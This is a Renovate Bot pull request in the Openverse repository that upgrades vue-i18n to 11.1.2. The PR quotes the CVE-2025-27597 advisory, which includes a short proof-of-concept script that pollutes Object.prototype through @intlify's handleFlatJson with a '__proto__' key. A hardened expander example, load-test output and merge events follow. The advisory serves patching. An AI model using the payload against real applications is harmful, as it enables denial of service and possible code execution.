
Conversation

openverse-bot
Collaborator

This PR contains the following updates:

Package           | Type            | Update | Change
vue-i18n (source) | devDependencies | minor  | 11.0.1 -> 11.1.2

GitHub Vulnerability Alerts

CVE-2025-27597

Vulnerability type:
Prototype Pollution

Vulnerability Location(s):

# v9.1
node_modules/@intlify/message-resolver/index.js

# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js

Description:

The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later) (previous versions might also be affected) is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with an Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) as the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @intlify/[email protected]
// run the script mentioned below
~$ node poc.js
// The expected output (if the code is still vulnerable) is below.
// Note that the output may differ slightly from one function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}
// poc.js
(async () => {
    const lib = await import('@intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();

Release Notes

intlify/vue-i18n (vue-i18n)

v11.1.2


What's Changed

🔒 Security Fixes

Full Changelog: intlify/vue-i18n@v11.1.1...v11.1.2

v11.1.1


Full Changelog: intlify/vue-i18n@v11.1.0...v11.1.1

v11.1.0


What's Changed

🌟 Features
📝️ Documentations

Full Changelog: intlify/vue-i18n@v11.0.1...v11.1.0


Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR has been generated by Renovate Bot.
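As an added, defender-side example (not @intlify/vue-i18n's own code): a flat-key expander of the kind the advisory describes, hardened so that a key segment such as __proto__ cannot reach Object.prototype, together with a regression check for the advisory's symptom. The names safeHandleFlatJson and prototypeIsClean are hypothetical, and the payload is constructed from the shape shown in the PoC.

```javascript
// Added example, not @intlify/vue-i18n code. A flat-key expander of the kind the
// advisory describes ("greeting.hello" becomes { greeting: { hello } }), hardened
// so no key segment can walk into Object.prototype. Names are hypothetical.

const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Expands dotted keys into nested plain objects. A segment that could reach the
// prototype chain is rejected with a TypeError rather than being written, and the
// walk only descends into own plain-object properties, never inherited ones.
function safeHandleFlatJson(obj) {
  if (!isPlainObject(obj)) return obj;
  const out = {};
  for (const key of Object.keys(obj)) { // own enumerable keys only
    const value = isPlainObject(obj[key]) ? safeHandleFlatJson(obj[key]) : obj[key];
    const segments = key.split('.');
    for (const seg of segments) {
      if (FORBIDDEN_SEGMENTS.has(seg)) {
        throw new TypeError(`unsafe message key segment: ${JSON.stringify(seg)}`);
      }
    }
    let cur = out;
    for (let i = 0; i < segments.length - 1; i++) {
      const seg = segments[i];
      if (!Object.prototype.hasOwnProperty.call(cur, seg) || !isPlainObject(cur[seg])) {
        cur[seg] = {};
      }
      cur = cur[seg];
    }
    cur[segments[segments.length - 1]] = value;
  }
  return out;
}

// Regression check for the advisory's symptom: the marker must not be reachable
// through the prototype chain of a fresh empty object.
function prototypeIsClean(marker) {
  return !(marker in {});
}
// Constructed input: the advisory's payload shape next to an ordinary message key.
const constructedPayload = JSON.parse('{"__proto__.pollutedKey": "x", "greeting.hello": "hi"}');
try {
  safeHandleFlatJson(constructedPayload);
} catch (e) {
  console.log('rejected:', e.message);
}
console.log('prototype clean:', prototypeIsClean('pollutedKey')); // true
```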

@openverse-bot openverse-bot requested a review from a team as a code owner March 7, 2025 16:07
@openverse-bot openverse-bot added dependencies Pull requests that update a dependency file 💻 aspect: code Concerns the software code in the repository 🟨 tech: javascript Involves JavaScript 🟩 priority: low Low priority and doesn't need to be rushed 🧰 goal: internal improvement Improvement that benefits maintainers, not users 🧱 stack: frontend Related to the Nuxt frontend labels Mar 7, 2025
@openverse-bot openverse-bot requested review from krysal and obulat March 7, 2025 16:07
@openverse-bot openverse-bot moved this to 👀 Needs Review in Openverse PRs Mar 7, 2025

github-actions bot commented Mar 7, 2025

Latest k6 run output [1]

     ✓ status was 200

     checks.........................: 100.00% ✓ 416      ✗ 0   
     data_received..................: 96 MB   397 kB/s
     data_sent......................: 55 kB   226 B/s
     http_req_blocked...............: avg=53.73µs  min=2.29µs   med=5µs      max=1.09ms   p(90)=141.79µs p(95)=226.31µs
     http_req_connecting............: avg=39.31µs  min=0s       med=0s       max=1.04ms   p(90)=97.76µs  p(95)=162.91µs
     http_req_duration..............: avg=164.42ms min=19.56ms  med=100.53ms max=1.1s     p(90)=392.89ms p(95)=500.57ms
       { expected_response:true }...: avg=164.42ms min=19.56ms  med=100.53ms max=1.1s     p(90)=392.89ms p(95)=500.57ms
   ✓ http_req_failed................: 0.00%   ✓ 0        ✗ 416 
     http_req_receiving.............: avg=173.39µs min=50.83µs  med=142.28µs max=2.76ms   p(90)=271.04µs p(95)=328.47µs
     http_req_sending...............: avg=26.68µs  min=7.47µs   med=22.9µs   max=129.76µs p(90)=35.41µs  p(95)=51.21µs 
     http_req_tls_handshaking.......: avg=0s       min=0s       med=0s       max=0s       p(90)=0s       p(95)=0s      
     http_req_waiting...............: avg=164.22ms min=19.44ms  med=100.39ms max=1.1s     p(90)=392.64ms p(95)=500.26ms
     http_reqs......................: 416     1.725399/s
     iteration_duration.............: avg=884.13ms min=217.92ms med=902.26ms max=1.85s    p(90)=1.2s     p(95)=1.59s   
     iterations.....................: 78      0.323512/s
     vus............................: 3       min=0      max=6 
     vus_max........................: 60      min=60     max=60

Footnotes

  1. This comment will automatically update with new output each time k6 runs for this PR

@obulat obulat merged commit 86f9097 into main Mar 7, 2025
83 checks passed
@obulat obulat deleted the gha-renovatenpm-vue-i18n-vulnerability branch March 7, 2025 16:25
@github-project-automation github-project-automation bot moved this from 👀 Needs Review to 🤝 Merged in Openverse PRs Mar 7, 2025